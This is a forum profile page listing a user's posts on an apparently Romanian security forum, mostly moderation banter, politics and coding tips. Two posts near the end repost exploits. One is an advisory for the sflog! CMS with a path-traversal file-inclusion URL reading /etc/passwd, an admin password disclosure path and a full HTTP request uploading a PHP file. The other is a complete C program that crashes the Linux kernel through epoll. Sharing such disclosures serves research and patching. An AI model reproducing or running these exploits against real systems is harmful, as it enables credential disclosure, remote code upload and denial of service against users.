Jump to content

DarkyAngel

Active Members
  • Posts

    676
  • Joined

  • Last visited

  • Days Won

    7

Everything posted by DarkyAngel

  1. poate c? vrea s? fraiereasc? lumea, cu prostii de genul cs; poate c? eu n-am nevoie de bani; poate c? m? doare , ?i încerc s? ajut cu pos-ul pe nemul?umi?ii de aici; ?i tot poate c? ?i-e ciud?. acum depinde cum o iei .
  2. uat d? fac? în plm, tu cau?i parteneri pentru cs pe un forum de securitate? :\
  3. pleac? b?! dup? ce c? mai faci ?i spam s? faci cele '10 posturi' cu greu, mai vii ?i cu abureli dinastea.. // era s? uit, "download la index-u site-ului" -> AICI <-
  4. ce soft de codare b?? tu l-ai rulat m?car s? vezi c? afi?eaz? exact cum e în fisier? // p.s, nu ?tiu cum s? explic ca la pro?ti, c? altfel n-am cum..
  5. `re you serious? ce ar trebui s? fac? scriptul? tot ce face, e c? interpreteaz? ce e în afar? <?php ?> ca un text, ?i chiar aia arat?, nu e criptat sub vreo form?..
  6. ^colegu`, tu ori nu ?tii s? cite?ti, ori e?ti prea prost pentru asta, ?i în ambele cazuri meri?i ban.. ( )
  7. c? bine zici.. m?car recuno?ti "c?-?i dai ?i tu aere" . // btw, eu zic ca sunt mult mai mul?i "întregi la cap"..
  8. ce ar fi amuzant? s? fie lumea a?a oarb?, s? voteze cu crin ( + ponta ), s? ajung? ??tia s? poa` s? fac? "ce vor", ?i s? ne exclud? ??tia din UE, s? vede?i voi atunci, subven?ii _)_, bani europeni _)_, cum o s? se goleasc? ?ara.. nu zic c? nu e mai bun nici b?sescu, dar m?car s? stea în coasta lor, s? nu-i lase s? fac? chiar "ce vor".. crede?i c? americanii, Obama, le e indiferent? da nu poa` s? zic? nimic, c? e în campanie, tace mâlc deocamdat?.. cum s?-i fie indiferent, dac? avioanele lor alea vechi, pe care vor sa le arunce la fier vechi, ?i b?sescu le ia cu câteva milioane de euro? cum s? nu-l iubeasc?? totu?i, ca om serios ca "pre?edinte" m? gândesc la ungureanu.. m?car dac? ne conduce cineva, s? fie în stare s? rosteasc? câteva cuvinte, pentru teza lui de doctorat, a umblat 10 ani, ?i acum e model pentru o facultate de prin anglia.. in caz ca trece referendumul, sigur o s?-l bage pe el la "înaintare"..
  9. dai dublu click pe label-ul acela, ?i ar trebui s? te duc? în code exact unde trebuie scris ( a?a era în versiunile mai vechi, cred c? e ?i acum )
  10. pune pe labelul respectiv cu textul, start("http://link-c?tre-ce-dore?ti");
  11. "b?ie?ii", da ce plm m? crezi femeie?
  12. ?i totusi mai postezi..?
  13. iapula! trade-urile de orice fel sunt interzise, presimt un baaan!
  14. Welcome to ps-axl.net ce p?rere ave?i acum, cum merge, cum se mi?c?, mai bine sau mai r?u ca pe vechiul host?
  15. colegu, mai cite?te ?i tu în plm REGULAMENTUL ... (1. titlu gre?it 2. categorie gre?it? 3. nu ai 10 posturi pentru cereri/ajutor 4. existen?? inutil? pe forum.. ?i. multe altele)
  16. nu am citit din ele, dar încearc? ?i aici: Index of /IT/ eventual, dac? vrei tu "hacking" mai mult aici: Index of /IT/Ethical Hacking/ ?i aici: Index of /IT/Hacking/
  17. e a N?pea oar? când î?i mai spun.. posteaz? ?i tu sursa , linkurile sunt acelea?i din pagina aia, tutorialul ?la a fost f?cut de ei, cineva s-a chinuit la el, m?car atât..
  18. problem solved. relog and try again.
  19. zât în plm, dac? ai luat ban ?i e?ti nemul?umit, plânge-te guvernului, c? le-a dat la toti ??tia ca voi net`
  20. pentru chestii de genul, ai "Fun Stuff"...
  21. chmod +x atomic sh atomic
  22. Wubi & shaggi, https://rstcenter.com/forum/forum.php?styleid=31
  23. Nici +rep nu merge , rst3 / beta @shaggi, userpanel -> General Settings
  24. :::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ posdub[at]gmail.com ] [ 2012-07-05 ] ################################################# # [ sflog! <= 1.00 ] Multiple Vulnerabilities # ################################################# # # Script: "sflog! is a flat and light CMS::Blog system." # # Vendor: http://sourceforge.net/projects/sflog/ # Download: http://sourceforge.net/projects/sflog/files/sflog/ # # # [ LFI ] # # PoC: http://localhost/sflog/index.php?blog=admin&section=../../../../../../../etc/&permalink=passwd # # File: ./sflog/index.php (lines: 1, 53) # ..cut.. # 1 <?php include("./includes/pageHeader.inc.php"); ?> // 1 # ..cut.. # # 53 require_once("./includes/entries.inc.php"); // 4 # ..cut.. # # File: ./sflog/includes/pageHeader.inc.php (lines: 20, 35) # ..cut.. # 20 $_blogID = $_GET['blog']; // 2 # ..cut.. # # 35 $_sectionID = $_GET['section']; // 3 # ..cut.. # # File: ./sflog/includes/entries.inc.php (lines: 2-11) # ..cut.. # 2 include_once("./cms/BlogEntry.class.php"); // 5 # 3 include_once("./cms/Blog.class.php"); # 4 $blog = new BlogEntry($_blogID,$_sectionID); // 6 # 5 $cms = new Blog(); # 6 $pages = $cms->getPostPerPage($_blogID); # 7 # 8 // checks for permalink # 9 if (isset($_GET['permalink'])){ # 10 $_permalink = $_GET['permalink']; // 8 # 11 $blog->showEntry($_permalink); // 9 # ..cut.. # # File: ./sflog/cms/BlogEntry.class.php (lines: 37-85) # ..cut.. # 37 class BlogEntry { # ..cut.. # 47 function BlogEntry($blogID,$sectionID){ // 7 # 48 error_reporting(E_USER_ERROR); // # 49 $this->blogID = $blogID; // # 50 $this->sectionID = $sectionID; // # 51 } # ..cut.. # 57 function showEntry($entryID){ // 10 # ..cut.. # 60 $JournalContentDir = "./blogs/".$this->blogID."/data/".$this->sectionID; // 11 # ..cut.. # 80 $JournalContent = $JournalContentDir."/".$entryID; // 12 # ..cut.. # 83 include_once $JournalContent; // 13 [LFI] # ..cut.. # ################################################# # [ Admin Password Disclosure ] # # PoC: http://localhost/sflog/admin/passwd # ################################################# # [ Arbitrary File Upload ] # # File: ./sflog/admin/includes/uploadContent.inc.php (lines: 62-72) # ..cut.. # 62 if (trim($_FILES['fileID']['name'])!=''){ # 63 $uploaddir = BLOG_PATH.$blogID.BLOG_UPLOADS; # 64 $uploadfile = $uploaddir . basename($_FILES['fileID']['name']); # 65 echo '<pre>'; # 66 if (move_uploaded_file($_FILES['fileID']['tmp_name'], $uploadfile)) { # 67 print(UPLOAD_SUCCESS); # 68 } else { # 69 print('<font color="red">'.UPLOAD_FAILED.'</font>'); # 70 } # 71 print "</pre>"; # 72 } # ..cut.. # # PoC: # # POST /sflog/admin/includes/uploadContent.inc.php HTTP/1.1 # Host: localhost # User-Agent: Mozilla/5.0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 # Accept-Language: pl,en-us;q=0.7,en;q=0.3 # Accept-Encoding: gzip, deflate # Connection: keep-alive # Content-Type: multipart/form-data; boundary=---------------------------4827543632391 # Content-Length: 411 # -----------------------------4827543632391 # Content-Disposition: form-data; name="blogID" # # admin # -----------------------------4827543632391 # Content-Disposition: form-data; name="MAX_FILE_SIZE" # # 0 # -----------------------------4827543632391 # Content-Disposition: form-data; name="fileID"; filename="info.php" # Content-Type: text/x-php # # <?php phpinfo(); ?> # # -----------------------------4827543632391-- # # # Uploaded file will be here: http://localhost/sflog/blogs/admin/uploads/info.php # ### [ dun / 2012 ] ##################################################### Sursa
      • 1
      • Upvote
  25. The Linux Kernel is prone to a local denial-of-service vulnerability. Successful exploits will allow attackers to cause the kernel to crash, denying service to legitimate users. #include <netinet/in.h> #include <sys/epoll.h> #include <errno.h> int main () { struct sockaddr_in addr; struct epoll_event event; int epfd1, epfd2, sock; int rc; int i = 0; while (1) { printf("ITERATION %d\n", ++i); epfd1 = epoll_create(1); printf("epoll_create() -> %d(%d)\n", epfd1, errno); epfd2 = epoll_create(1); printf("epoll_create() -> %d(%d)\n", epfd2, errno); sock = socket(PF_INET, SOCK_STREAM, 0); printf("socket() -> %d(%d)\n", sock, errno); addr.sin_family = AF_INET; addr.sin_port = 0; addr.sin_addr.s_addr = 0; rc = bind(sock, (struct sockaddr*)&addr, sizeof(addr)); printf("bind() -> %d(%d)\n", rc, errno); rc = listen(sock, 1); printf("listen() -> %d(%d)\n", rc, errno); event.data.fd = sock; event.events = 0; rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, sock, &event); printf("epoll_ctl() -> %d(%d)\n", rc, errno); event.data.fd = epfd2; event.events = EPOLLIN; rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, epfd2, &event); printf("epoll_ctl() -> %d(%d)\n", rc, errno); event.data.fd = epfd1; event.events = EPOLLIN; rc = epoll_ctl(epfd2, EPOLL_CTL_ADD, epfd1, &event); printf("epoll_ctl() -> %d(%d)\n", rc, errno); rc = close(epfd1); printf("close(epfd1) -> %d(%d)\n", rc, errno); rc = close(epfd2); printf("close(epfd2) -> %d(%d)\n", rc, errno); rc = close(sock); printf("close(sock) -> %d(%d)\n", rc, errno); sleep(1); printf("\n\n"); } return 0; } Sursa
×
×
  • Create New...